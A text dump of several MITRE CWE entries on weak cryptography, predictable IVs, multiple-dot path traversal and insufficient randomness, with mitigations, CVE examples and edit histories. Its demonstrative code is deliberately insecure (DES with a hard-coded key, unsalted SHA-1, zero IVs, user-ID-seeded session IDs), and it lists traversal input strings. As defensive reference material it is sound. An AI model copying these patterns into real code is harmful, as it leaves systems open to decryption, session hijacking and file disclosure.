Code Weakness Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Libraries or Frameworks - - When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis. - For example, US government systems require FIPS 140-2 certification. - Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak. - Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267] - - - - Architecture and Design - Ensure that the design allows one cryptographic algorithm can be replaced with another in the next generation or version. Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software. - Defense in Depth - - - Architecture and Design - Carefully manage and protect cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography itself is irrelevant. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Industry-standard implementations will save development time and may be more likely to avoid errors that can occur during implementation of cryptographic algorithms. Consider the ESAPI Encryption feature. - - - - Implementation - Architecture and Design - When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. - - - - - These code examples use the Data Encryption Standard (DES). - - EVP_des_ecb(); - - - Cipher des=Cipher.getInstance("DES...");des.initEncrypt(key2); - - - function encryptPassword($password){$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$key = "This is a password encryption key";$encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv);return $encryptedPassword;} - - Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES). - - - - - CVE-2008-3775 - Product uses "ROT-25" to obfuscate the password in the registry. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3775 - - - CVE-2007-4150 - product only uses "XOR" to obfuscate sensitive data - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4150 - - - CVE-2007-5460 - product only uses "XOR" and a fixed key to obfuscate sensitive data - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5460 - - - CVE-2005-4860 - Product substitutes characters with other characters in a fixed way, and also leaves certain input characters unchanged. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4860 - - - CVE-2002-2058 - Attackers can infer private IP addresses by dividing each octet by the MD5 hash of '20'. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058 - - - CVE-2008-3188 - Product uses DES when MD5 has been specified in the configuration, resulting in weaker-than-expected password hashes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3188 - - - CVE-2005-2946 - Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946 - - - CVE-2007-6013 - Product uses the hash of a hash for authentication, allowing attackers to gain privileges if they can obtain the original hash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6013 - - - - - Using a broken or risky cryptographic algorithm - - - A8 - Insecure Storage - CWE More Specific - - - MSC30-C - Do not use the rand() function for generating pseudorandom numbers - CWE More Abstract - - - MSC32-C - Properly seed pseudorandom number generators - CWE More Abstract - - - MSC02-J - Generate strong random numbers - - - ASCSM-CWE-327 - - - - - - - - - - - - - - - - - - - - - - - - - - Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. - - - - CLASP - 2006-07-19 - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Common_Consequences, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-07-27 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated References - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Detection_Factors, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - Using a Broken or Risky Cryptographic Algorithm - - - - The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack). - - A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold: - - 1. The algorithm is not invertible (also called "one-way" or "not reversible") - 2. The algorithm is deterministic; the same input produces the same digest every time - - - Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following: - - 1. the original input (preimage attack), given only the digest - 2. another input that can produce the same digest (2nd preimage attack), given the original input - 3. a set of two or more inputs that evaluate to the same digest (birthday attack), given the actor can arbitrarily choose the inputs to be hashed and can do so a reasonable amount of times - - What is regarded as "reasonable" varies by context and threat model, but in general, "reasonable" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world. - Any algorithm does not meet the above conditions will generally be considered weak for general use in hashing. - In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a "rainbow table" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - - Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. - Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. - Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. - - High - - - - - In both of these examples, a user is logged in if their given password matches a stored password: - - unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); - //Login if hash matches stored hash - if (equal(ctext, secret_password())) {login_user();}} - - - String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); - //Login if hash matches stored hash - if (equal(digest,secret_password())) {login_user();} - - This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). - - - - - CVE-2005-4900 - SHA-1 algorithm is not collision-resistant. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4900 - - - CVE-2020-25685 - DNS product uses a weak hash (CRC32 or SHA-1) of the query name, allowing attacker to forge responses by computing domain names with the same hash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25685 - - - CVE-2012-6707 - blogging product uses MD5-based algorithm for passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6707 - - - CVE-2019-14855 - forging of certificate signatures using SHA-1 collisions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855 - - - CVE-2017-15999 - mobile app for backup sends SHA-1 hash of password in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15999 - - - CVE-2006-4068 - Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068 - - - - - Reversible One-Way Hash - - - - - - - - - - - - - - - - - - - - - - - Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, References - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key. - - CBC mode eliminates a weakness of Electronic Code - Book (ECB) mode by allowing identical plaintext blocks to - be encrypted to different ciphertext blocks. This is - possible by the XOR-ing of an IV with the initial plaintext - block so that every plaintext block in the chain is XOR'd - with a different value before encryption. If IVs are - reused, then identical plaintexts would be encrypted to - identical ciphertexts. However, even if IVs are not - identical but are predictable, then they still break the - security of CBC mode against Chosen Plaintext Attacks - (CPA). - - - - - - - - - - - CBC mode is a commonly used mode of operation for a - block cipher. It works by XOR-ing an IV with the initial - block of a plaintext prior to encryption and then - XOR-ing each successive block of plaintext with the - previous block of ciphertext before encryption. - - C_0 = IV - C_i = E_k{M_i XOR C_{i-1}} - - - When used properly, CBC mode provides security against - chosen plaintext attacks. Having an unpredictable IV - is a crucial underpinning of this. See [REF-1171]. - - - - - Architecture and Design - Designers might assume a non-cryptographic context for a cryptographic variable. - - - Implementation - Developers might dismiss the importance of an unpredictable IV and choose an easier implementation to save effort, weakening the scheme in the process. - - - Medium - - - Confidentiality - Read Application Data - If the IV is not properly initialized, data that is encrypted can be compromised and leak information. - - - - - Implementation - NIST recommends two methods of generating unpredictable IVs for CBC mode [REF-1172]. The first is to generate the IV randomly. The second method is to encrypt a nonce with the same key and cipher to be used to encrypt the plaintext. In this case the nonce must be unique but can be predictable, since the block cipher will act as a pseudo random permutation. - - - - - In the following examples, CBC mode is used when encrypting data: - - EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv); - - - public class SymmetricCipherTest { - public static void main() { - - byte[] text ="Secret".getBytes();byte[] iv ={0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};KeyGenerator kg = KeyGenerator.getInstance("DES");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes); - } - } - - In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack. - - - - - CVE-2020-5408 - encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408 - - - CVE-2017-17704 - messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704 - - - CVE-2017-11133 - application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133 - - - CVE-2007-3528 - Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528 - - - CVE-2011-3389 - BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389 - - - - Cryptography - - - - Not using a random IV with CBC mode - - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Common_Consequences, Functional_Areas, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-06-20 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Description, Maintenance_Notes, Name, References - - Not Using a Random IV with CBC Mode - Not Using an Unpredictable IV with CBC Mode - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '....' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to "..\..\.." and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of "./" sequences, can ultimately produce valid ".." sequences due to a collapse into unsafe value (CWE-182). - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0240 - read files via "/........../" in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240 - - - CVE-2000-0773 - read files via "...." in web server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773 - - - CVE-1999-1082 - read files via "......" in web server (doubled triple dot?) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082 - - - CVE-2004-2121 - read files via "......" in web server (doubled triple dot?) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121 - - - CVE-2001-0491 - multiple attacks using "..", "...", and "...." in different commands - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491 - - - CVE-2001-0615 - "..." or "...." in chat server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615 - - - - - '....' (multiple dot) - - - SFP16 - Path Traversal - - - - Like the triple-dot CWE-32, this manipulation probably hides multiple weaknesses that should be made more explicit. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Multiple Dot - '....' - - - - The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers. - When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information. - - - - - - Primary - - - - - - - - Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value. - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Other - Other - When a protection mechanism relies on random values to restrict access to a sensitive resource, such as a session ID or a seed for generating a cryptographic key, then the resource being protected could be accessed by guessing the ID or key. - - - Access Control - Other - Bypass Protection Mechanism - Other - If software relies on unique, unguessable IDs to identify a resource, an attacker might be able to guess an ID for a resource that is owned by another user. The attacker could then read the resource, or pre-create a resource with the same ID to prevent the legitimate program from properly sending the resource to the intended user. For example, a product might maintain session information in a file whose name is based on a username. An attacker could pre-create this file for a victim user, then set the permissions so that the application cannot generate the session for the victim, preventing the victim from using the application. - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - When an authorization or authentication mechanism relies on random values to restrict access to restricted functionality, such as a session ID or a seed for generating a cryptographic key, then an attacker may access the restricted functionality by guessing the ID or key. - - - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and look for library functions that indicate when randomness is being used. Run the process multiple times to see if the seed changes. Look for accesses of devices or equivalent resources that are commonly used for strong (or weak) randomness, such as /dev/urandom on Linux. Look for library or system calls that access predictable information such as process IDs and system time. - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Man-in-the-middle attack tool - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Use a well-vetted algorithm that is currently considered to be strong by experts in the field, and select well-tested implementations with adequate length seeds. - In general, if a pseudo-random number generator is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts. - Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a "random enough" number. - - - - Implementation - Consider a PRNG that re-seeds itself as needed from high quality pseudo-random output sources, such as hardware devices. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - Testing - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - This code attempts to generate a unique random identifier for a user's session. - - function generateSessionID($userID){srand($userID);return rand();} - - Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. - This example also exhibits a Small Seed Space (CWE-339). - - - The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. - - String GenerateReceiptURL(String baseUrl) {Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + ".html");} - - This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. - - - - - CVE-2009-3278 - Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278 - - - CVE-2009-3238 - Random number generator can repeatedly generate the same value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238 - - - CVE-2009-2367 - Web application generates predictable session IDs, allowing session hijacking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367 - - - CVE-2009-2158 - Password recovery utility generates a relatively small number of random passwords, simplifying brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2158 - - - CVE-2009-0255 - Cryptographic key created with a seed based on the system time. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0255 - - - CVE-2008-5162 - Kernel function does not have a good entropy source just after boot. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162 - - - CVE-2008-4905 - Blogging software uses a hard-coded salt when calculating a password hash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905 - - - CVE-2008-4929 - Bulletin board application uses insufficiently random names for uploaded files, allowing other users to access private files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4929 - - - CVE-2008-3612 - Handheld device uses predictable TCP sequence numbers, allowing spoofing or hijacking of TCP connections. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3612 - - - CVE-2008-2433 - Web management console generates session IDs based on the login time, making it easier to conduct session hijacking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2433 - - - CVE-2008-0166 - SSL library uses a weak random number generator that only generates 65,536 unique keys. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166 - - - CVE-2008-2108 - Chain: insufficient precision causes extra zero bits to be assigned, reducing entropy for an API function that generates random numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 - - - CVE-2008-2108 - Chain: insufficient precision (CWE-1339) in - random-number generator causes some zero bits to be reliably - generated, reducing the amount of entropy (CWE-331) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 - - - CVE-2008-2020 - CAPTCHA implementation does not produce enough different images, allowing bypass using a database of all possible checksums. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2020 - - - CVE-2008-0087 - DNS client uses predictable DNS transaction IDs, allowing DNS spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087 - - - CVE-2008-0141 - Application generates passwords that are based on the time of day. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0141 - - - - Cryptography - Authentication - Session Management - - - - Randomness and Predictability - - - Insecure Randomness - - - A2 - Broken Access Control - CWE More Specific - - - CON33-C - Avoid race conditions when using library functions - Imprecise - - - MSC30-C - Do not use the rand() function for generating pseudorandom numbers - CWE More Abstract - - - MSC32-C - Properly seed pseudorandom number generators - CWE More Abstract - - - 11 - Brute Force - - - 18 - Credential/Session Prediction - - - MSC02-J - Generate strong random numbers - - - - - - - - - - - - - - - This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others. - - As of CWE 4.3, CWE-330 and its descendants are being - investigated by the CWE crypto team to identify gaps - related to randomness and unpredictability, as well as - the relationships between randomness and cryptographic - primitives. This "subtree analysis" might - result in the addition or deprecation of existing - entries; the reorganization of relationships in some - views, e.g. the research view (CWE-1000); more consistent - use of terminology; and/or significant modifications to - related entries. 